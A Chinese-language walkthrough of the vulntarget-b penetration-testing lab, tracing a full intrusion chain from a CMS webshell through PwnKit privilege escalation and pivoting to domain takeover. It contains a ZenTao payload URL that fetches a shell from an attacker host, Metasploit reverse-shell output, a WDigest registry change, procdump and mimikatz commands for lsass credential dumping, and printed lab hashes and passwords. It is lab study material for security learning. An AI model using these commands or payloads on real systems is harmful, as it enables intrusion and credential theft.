【vulntarget】系列:vulntarget-b 练习WP

本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试

一、靶场信息:

下载地址:

百度云:
链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
提取码:s4ka

**拓扑图:**IP信息根据本地搭建环境自行配置改变
【vulntarget】系列:vulntarget-b 练习WP_第1张图片
官方WP:vulntarget漏洞靶场系列(二)— vulntarget-b

二、使用到的工具、漏洞或技术:

工具:
Viper、nmap、蚁剑
漏洞或技术:
极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278

三、步骤:

  1. 通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.100.19,直接扫描靶机IP信息
    【vulntarget】系列:vulntarget-b 练习WP_第2张图片

  2. 依次访问靶机的端口,发现81端口打开为极致CMS:

【vulntarget】系列:vulntarget-b 练习WP_第3张图片

  1. 此处利用极致CMS后台getshell,访问admin.php,抓包进行密码爆破,得到密码 admin23

【vulntarget】系列:vulntarget-b 练习WP_第4张图片
【vulntarget】系列:vulntarget-b 练习WP_第5张图片

  1. 获取密码后,登陆后台后依次点击:插件管理 - 插件列表 - 搜索【在线编辑】

【vulntarget】系列:vulntarget-b 练习WP_第6张图片

  1. 点击右侧【下载】按钮进行下载,下载成功后点击【安装】,安装完成后再点击【配置】,在弹出的页面随意输入用户名和密码点击2次【立即提交】即可:

【vulntarget】系列:vulntarget-b 练习WP_第7张图片

  1. 在新打开的页面点击【登录】:

【vulntarget】系列:vulntarget-b 练习WP_第8张图片

  1. 进入文件管理器后,可以任意新建、上传或修改文件进行传入webshell,此处选择将index.php修改为webshell,双击index.php文件,再点击【编辑】:

【vulntarget】系列:vulntarget-b 练习WP_第9张图片
【vulntarget】系列:vulntarget-b 练习WP_第10张图片

  1. 写入一句话后点击右上角【save】:

【vulntarget】系列:vulntarget-b 练习WP_第11张图片

  1. 再次访问首页,出现phpinfo,即webshell写入成功,使用蚁剑连接:

【vulntarget】系列:vulntarget-b 练习WP_第12张图片
【vulntarget】系列:vulntarget-b 练习WP_第13张图片

  1. viper开启监听,此处要选择linux的payload:

【vulntarget】系列:vulntarget-b 练习WP_第14张图片

  1. 生成elf格式后门:

【vulntarget】系列:vulntarget-b 练习WP_第15张图片

  1. 将elf文件上传至靶机,再执行的时候发现宝塔禁用函数,此处使用蚁剑插件进行绕过:

【vulntarget】系列:vulntarget-b 练习WP_第16张图片
【vulntarget】系列:vulntarget-b 练习WP_第17张图片
【vulntarget】系列:vulntarget-b 练习WP_第18张图片

  1. 使用插件绕过后,添加执行权限,并执行centos.elf文件:

【vulntarget】系列:vulntarget-b 练习WP_第19张图片

  1. 返回viper查看,centos已上线,但是权限较低,需要进行提权:

【vulntarget】系列:vulntarget-b 练习WP_第20张图片

  1. 打开MSFCONSOLE,进入centos的session,查找可提权模块:
msf6 > msf6 > msf6 > sessions 1
[*] Starting interaction with 1...

meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.100.19 - Collecting local exploits for x64/linux...
[*] 192.168.100.19 - 187 exploit checks are being tried...
[+] 192.168.100.19 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.100.19 - exploit/linux/local/network_manager_c_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.100.19 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.100.19 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 192.168.100.19 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[+] 192.168.100.19 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 63 / 63
[*] 192.168.100.19 - Valid modules for session 1:
============================

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/network_manager_c_username_priv_esc          Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 4   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 5   exploit/linux/local/sudo_baron_samedit                              Yes                      The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.

meterpreter >

【vulntarget】系列:vulntarget-b 练习WP_第21张图片

  1. 此处使用 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 进行提权,进行如下设置后,输入 run 运行,稍后可看见root权限session上线:
meterpreter > bg[*] Backgrounding session 1...

msf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files



Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.64.178   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1112
LPORT => 1112
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.64.178:1112 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.csgzrd
[+] The target is vulnerable.
[*] Writing '/tmp/.vgugzbmkrnb/ngaufeqwitog/ngaufeqwitog.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.vgugzbmkrnb
[*] Sending stage (3016644 bytes) to 192.168.64.42
[+] Deleted /tmp/.vgugzbmkrnb/ngaufeqwitog/ngaufeqwitog.so
[+] Deleted /tmp/.vgugzbmkrnb/.jexrlg
[*] Meterpreter session 2 opened (192.168.64.178:1112 -> 192.168.64.42:1103) at 2023-06-27 08:09:30 +0000

meterpreter >

【vulntarget】系列:vulntarget-b 练习WP_第22张图片

  1. 添加路由,并扫描内网资产:

【vulntarget】系列:vulntarget-b 练习WP_第23张图片
【vulntarget】系列:vulntarget-b 练习WP_第24张图片
【vulntarget】系列:vulntarget-b 练习WP_第25张图片

  1. 扫描发现内网10.0.20.66存在3306、3389、8080端口,配置代理,进行访问:

【vulntarget】系列:vulntarget-b 练习WP_第26张图片

  1. 没法爆破,使用提示的账号密码登录:admin/Admin123
  2. 查看版本信息,为禅道12.4.2版本:

【vulntarget】系列:vulntarget-b 练习WP_第27张图片
也可以通过调用接口查看版本信息:http://10.0.20.66:8080/index.php?mode=getconfig
【vulntarget】系列:vulntarget-b 练习WP_第28张图片

  1. 利用禅道 12.4.2 后台任意文件上传漏洞进行getshell:

在centos的tmp目录下创建test.php的shell文件,使用python开启http服务:
【vulntarget】系列:vulntarget-b 练习WP_第29张图片
构建URL为极致CMS中的index.php:HTTP://10.0.20.30:8081/test.php
再进行base64加密:SFRUUDovLzEwLjAuMjAuMzA6ODA4MS90ZXN0LnBocA==
通过URL请求:http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODA4MS90ZXN0LnBocA==
【vulntarget】系列:vulntarget-b 练习WP_第30张图片

  1. webshell上传成功后,访问URL无法访问,但是使用蚁剑可以连接成功:

【vulntarget】系列:vulntarget-b 练习WP_第31张图片

  1. 准备上线MSF,通过centos的session转发上线win10,建立监听,生成后门程序:

【vulntarget】系列:vulntarget-b 练习WP_第32张图片

  1. 生成的后门程序无法直接使用,因为win10存在杀软:

【vulntarget】系列:vulntarget-b 练习WP_第33张图片

  1. 制作免杀后门程序,此次直接使用工具生成免杀,上传到win10中并执行,这一步我的蚁剑没法上传,使用冰蝎进行上传,并执行:

【vulntarget】系列:vulntarget-b 练习WP_第34张图片

  1. Viper成功上线win10,低权限用户,需要进行提权:

【vulntarget】系列:vulntarget-b 练习WP_第35张图片

  1. 此处可直接使用 getsystem 提权:
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

【vulntarget】系列:vulntarget-b 练习WP_第36张图片

  1. 使用kiwi,获取明文密码信息:
meterpreter > load kiwiLoading extension kiwi...

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds all
[-] Unknown command: creds
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain      NTLM                              SHA1                                      DPAPI
--------       ------      ----                              ----                                      -----
Administrator  VULNTARGET  570a9a65db8fba761c1008a51d4c95ab  759e689a07a84246d0b202a80f5fd9e335ca5392  498266e09dee384e15ad686ed4de3822
Administrator  WIN10       579da618cfbfa85247acf1f800a280a4  39f572eceeaa2174e87750b52071582fc7f13118
WIN10$         VULNTARGET  dfda64c13ffda08549508af5e10824d0  67e0f7c22096658e1b897623c7ad877d4e1e1499
win101         VULNTARGET  282d975e35846022476068ab5a3d72df  bc9ecca8d006d8152bd51db558221a0540c9d604  8d6103509e746ac0ed9641f7c21d7cf7

wdigest credentials
===================

Username       Domain      Password
--------       ------      --------
(null)         (null)      (null)
Administrator  VULNTARGET  (null)
Administrator  WIN10       (null)
WIN10$         VULNTARGET  (null)
win101         VULNTARGET  (null)

kerberos credentials
====================

Username       Domain          Password
--------       ------          --------
(null)         (null)          (null)
Administrator  VULNTARGET.COM  Admin@123
Administrator  WIN10           (null)
Administrator  VULNTARGET.COM  admin@123
WIN10$         vulntarget.com  OE/MDy7v#-BBGb8qj/#kAkqw(aHS$r>@p/>%8`OK^tjpcJ?r&Fjgn!WN(/ta?X_E :/nF:A!v!qK5M.WzK:?`Wn!huUI0,kJQYMI'4tqypP<*GO_[R,=+z'!
win10$         VULNTARGET.COM  (null)
win101         VULNTARGET.COM  (null)


meterpreter >

【vulntarget】系列:vulntarget-b 练习WP_第37张图片

  1. win10已成功拿下,现在使用noPac拿下域控,需要获取当前域账号win101的密码信息,此处使用对NTLM直接进行解密,获得明文密码:admin#123:

【vulntarget】系列:vulntarget-b 练习WP_第38张图片
【vulntarget】系列:vulntarget-b 练习WP_第39张图片

  1. 或者利用注册表和procdump+mimikatz获取密码:

修改注册表:reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改玩注册表后需要用户重新登录才能记录到密码信息,此处模拟用户使用win101账户登录

meterpreter > shell
Process 10356 created.
Channel 1 created.
Microsoft Windows [版本 10.0.18363.418]
(c) 2019 Microsoft Corporation。保留所有权利。

C:\inetpub\zentao\zentaopms\www\data\client\1>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
操作成功完成。

C:\inetpub\zentao\zentaopms\www\data\client\1>

【vulntarget】系列:vulntarget-b 练习WP_第40张图片

  1. 上传procdump到win10机器中,获取lsass文件:
C:\inetpub\zentao\zentaopms\www\data\client\1\lsass>procdump64.exe -accepteula -ma lsass.exe  lsass.dmp
procdump64.exe -accepteula -ma lsass.exe  lsass.dmp

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[12:13:26] Dump 1 initiated: C:\inetpub\zentao\zentaopms\www\data\client\1\lsass\lsass.dmp
[12:13:27] Dump 1 writing: Estimated dump file size is 46 MB.
[12:13:28] Dump 1 complete: 47 MB written in 1.5 seconds
[12:13:28] Dump count reached.


C:\inetpub\zentao\zentaopms\www\data\client\1\lsass>

【vulntarget】系列:vulntarget-b 练习WP_第41张图片

  1. 本地使用mimikatz.exe进行读取:

mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full" exit

  1. 收集域信息:
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions 10
[*] Starting interaction with 10...

meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: WIN-UH20PRD3EAO.vulntarget.com (IP: 10.0.10.100)
meterpreter >

【vulntarget】系列:vulntarget-b 练习WP_第42张图片

  1. 添加路由后,开启代理,使用kali配置代理,使用noPac攻击,拿下域控:

【vulntarget】系列:vulntarget-b 练习WP_第43张图片

  1. 完整链路图:

【vulntarget】系列:vulntarget-b 练习WP_第44张图片
【vulntarget】系列:vulntarget-b 练习WP_第45张图片

靶场WP持续更新……

你可能感兴趣的:(靶场记录,网络安全,安全)